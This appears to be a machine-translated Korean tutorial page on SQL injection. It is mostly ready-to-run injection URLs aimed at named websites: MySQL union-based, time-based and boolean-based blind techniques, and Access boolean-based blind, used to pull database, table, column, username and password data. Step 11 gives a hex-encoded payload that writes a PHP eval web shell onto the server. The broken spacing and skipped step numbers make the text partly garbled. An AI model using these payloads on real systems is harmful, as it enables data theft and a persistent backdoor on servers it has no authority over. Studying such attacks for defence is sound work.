[웹 구멍] SQL 주입
Mysql 주입
union query (union 공동 조회)
time - based blind (시간 기반 블라인드)
boolean - based blind (불 형 블라인드 기반)
액세스 주입
boolean - based blind (불 형 블라인드 기반)
Mysql 주입
union query (union 공동 조회)
1. 회 현 정 답
http://www.dandelion.com/about.php?id=15' and 1=1 --+
2. 리 턴 오류, 주입 이 있 음 을 단정 하고 payload 확인
http://www.dandelion.com/about.php?id=15' and 1=2 --+
3. 리 턴 오류, 필드 가 9 보다 작 음
http://www.dandelion.com/about.php?id=15' order by 9 --+
4. 리 턴 이 정확 하고 필드 길이 가 8 입 니 다.
http://www.dandelion.com/about.php?id=15' order by 8 --+
5. 매개 변 수 를 마이너스 (페이지 출력 비우 기) 로 바 꾸 고 공동 조 회 를 구성 합 니 다.
http://www.dandelion.com/about.php?id=-15' union select 1,2,3,4,5,6,7,8 --+
http://www.dandelion.com/about.php?id=-15' union select 1,2,3,4,concat_ws('*****',user(),database(),version(),@@datadir,@@version_compile_os),6,7,8 --+
주: 함수 concatstr1, str2, str3) 의 역할 은 str1 로 str2 와 str3 를 분리 하여 출력 하 는 것 이다.
7. 모든 데이터베이스 이름 조회
http://www.dandelion.com/about.php?id=-15' union select 1,2,3,4,group_concat(schema_name),6,7,8 from information_schema.schemata --+
주: 함수 groupconcat (str 1) 의 역할 은 한번에 str 1 에 속 하 는 내용 을 출력 하 는 것 이다.
8. 조회 표 이름
http://www.dandelion.com/about.php?id=-15' union select 1,2,3,4,group_concat(table_name),6,7,8 from information_schema.tables where table_schema='dandelion'--+
9. 검색 필드 이름
http://www.dandelion.com/about.php?id=-15' union select 1,2,3,4,group_concat(column_name),6,7,8 from information_schema.columns where table_name='about_class' --+
10. 조회 데이터
http://www.dandelion.com/about.php?id=-15' union select 1,2,3,4,group_concat(concat_ws('*****',id,c_name,c_order)),6,7,8 from about_class --+
http://www.dandelion.com/about.php?id=-15' union select 1,2,3,4,concat_ws('*****',id,c_name,c_order),6,7,8 from about_class limit 1,1 --+
11. 웹 셸 에 쓰기
http://www.dandelion.com/about.php?id=-15' union select 1,2,3,4,0x73656c65637420223c3f70687020406576616c28245f504f53545b27313233275d293b3f3e2220696e746f206f757466696c652022433a5c5c7777775c5c7765627368656c6c2e70687022,6,7,8 --+
1. 시간 주입 이 존재 하 는 지 테스트 하고 존재 하면 응답 을 지연 시 킵 니 다. 약 2s + 입 니 다. 그렇지 않 으 면 1s 보다 적 습 니 다.
http://www.dandelion.com/about.php?id=15 and sleep(2) --+
http://www.dandelion.com/about.php?id=15' and sleep(2) --+
http://www.dandelion.com/about.php?id=15' and sleep(if(length(database())=9,2,0)) --+
http://www.dandelion.com/about.php?id=15' and sleep(if(ascii(substr(database(),1,1))=100,2,0)) --+
주: 함수 substr (str1, int1, int2) 의 역할 은 str 1 이 int1 위치 에서 시 작 된 후 int2 문 자 를 출력 하 는 것 입 니 다.
4. 첫 번 째 표 이름 의 길 이 를 추측 합 니 다.
http://www.dandelion.com/about.php?id=15' and sleep(if(length((select table_name from information_schema.tables where table_schema='dandelion' limit 0,1))=11,2,0)) --+
5. 첫 번 째 표 이름 의 첫 번 째 문 자 를 추측 합 니 다.
http://www.dandelion.com/about.php?id=15' and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema='dandelion' limit 0,1),1,1))=97,2,0)) --+
6. 첫 번 째 열 이름 의 길 이 를 추측 합 니 다.
http://www.dandelion.com/about.php?id=15' and sleep(if(length((select column_name from information_schema.columns where table_name='about_class' limit 0,1))=2,2,0)) --+
http://www.dandelion.com/about.php?id=15' and sleep(if(ascii(substr((select column_name from information_schema.columns where table_name='about_class' limit 0,1),1,1))=105,2,0)) --+
8. 첫 번 째 줄 데이터 의 길 이 를 추측 합 니 다.
http://www.dandelion.com/about.php?id=15' and sleep(if(length((select id from about_class limit 0,1))=1,2,0)) --+
http://www.dandelion.com/about.php?id=15' and sleep(if(ascii(substr((select id from about_class limit 0,1),1,1))=49,2,0)) --+
1. 주입 여 부 를 판단 하고 payload
http://www.dandelion.com/about.php?id=15' and 1=1 --+
http://www.dandelion.com/about.php?id=15' and 1=2 --+
http://www.dandelion.com/about.php?id=15' and length(database())>8 --+
http://www.dandelion.com/about.php?id=15' and length(database())>9 --+
3. 데이터베이스 첫 번 째 문자 판단
http://www.dandelion.com/about.php?id=15' and ascii(substr(database(),1,1))>99 --+
http://www.dandelion.com/about.php?id=15' and ascii(substr(database(),1,1))>100 --+
4. 첫 번 째 표 이름 길이 판단
http://www.dandelion.com/about.php?id=15' and length((select table_name from information_schema.tables where table_schema='dandelion' limit 0,1))>11 --+
http://www.dandelion.com/about.php?id=15' and length((select table_name from information_schema.tables where table_schema='dandelion' limit 0,1))>10 --+
5. 첫 번 째 표 이름 의 첫 번 째 문 자 를 판단 합 니 다.
http://www.dandelion.com/about.php?id=15' and ascii(substr((select table_name from information_schema.tables where table_schema='dandelion' limit 0,1),1,1))>97 --+
http://www.dandelion.com/about.php?id=15' and ascii(substr((select table_name from information_schema.tables where table_schema='dandelion' limit 0,1),1,1))>96 --+
6. 첫 번 째 열 이름 의 길 이 를 판단 합 니 다.
http://www.dandelion.com/about.php?id=15' and length((select column_name from information_schema.columns where table_name='about_class' limit 0,1))>2--+
http://www.dandelion.com/about.php?id=15' and length((select column_name from information_schema.columns where table_name='about_class' limit 0,1))>1--+
7. 첫 번 째 열 이름 의 첫 번 째 문 자 를 판단 합 니 다.
http://www.dandelion.com/about.php?id=15' and ascii(substr((select column_name from information_schema.columns where table_name='about_class' limit 0,1),1,1))>105 --+
www.dandelion.com/about.php?id=15' and ascii(substr((select column_name from information_schema.columns where table_name='about_class' limit 0,1),1,1))>104 --+
8. id 열 첫 번 째 줄 데이터 의 길 이 를 판단 합 니 다.
http://www.dandelion.com/about.php?id=15' and length((select id from about_class limit 0,1))>0 --+
http://www.dandelion.com/about.php?id=15' and length((select id from about_class limit 0,1))>1 --+
9. id 열 첫 번 째 줄 데 이 터 를 판단 하 는 첫 번 째 문자
http://www.dandelion.com/about.php?id=15' and ascii(substr((select id from about_class limit 0,1),1,1))>48 --+
http://www.dandelion.com/about.php?id=15' and ascii(substr((select id from about_class limit 0,1),1,1))>49 --+
액세스 주입
boolean - based blind (불 형 블라인드 기반)
1. 주입 및 payload 확인
http://www.liang.com/products_detail.asp?id=1762 and 1=1
http://www.liang.com/products_detail.asp?id=1762 and 1=2
http://www.liang.com/products_detail.asp?id=1762 and exists(select * from liang)
http://www.liang.com/products_detail.asp?id=1762 and exists(select username from liang)
http://www.liang.com/products_detail.asp?id=1762 and exists(select password from liang)
http://www.liang.com/products_detail.asp?id=1762 and (select top 1 len(username) from liang)=5
5. username 의 첫 번 째 줄 데이터 의 값 을 맞 추 는 첫 번 째 문자
http://www.liang.com/products_detail.asp?id=1762 and(select top 1 asc(mid(username,1,1)) from liang)=97
주: 함수 asc () 는 my sql 에서 ascii () 와 역할 이 같 고 mid () 는 my sql 에서 substr () 와 역할 이 같 습 니 다.
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
[웹 구멍] SQL 주입3. 데이터베이스 이름 의 첫 번 째 문 자 를 추측 합 니 다. 4. 첫 번 째 표 이름 의 길 이 를 추측 합 니 다. 6. 첫 번 째 열 이름 의 길 이 를 추측 합 니 다. 7. 첫 번 째 열 이름 의 첫 번...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.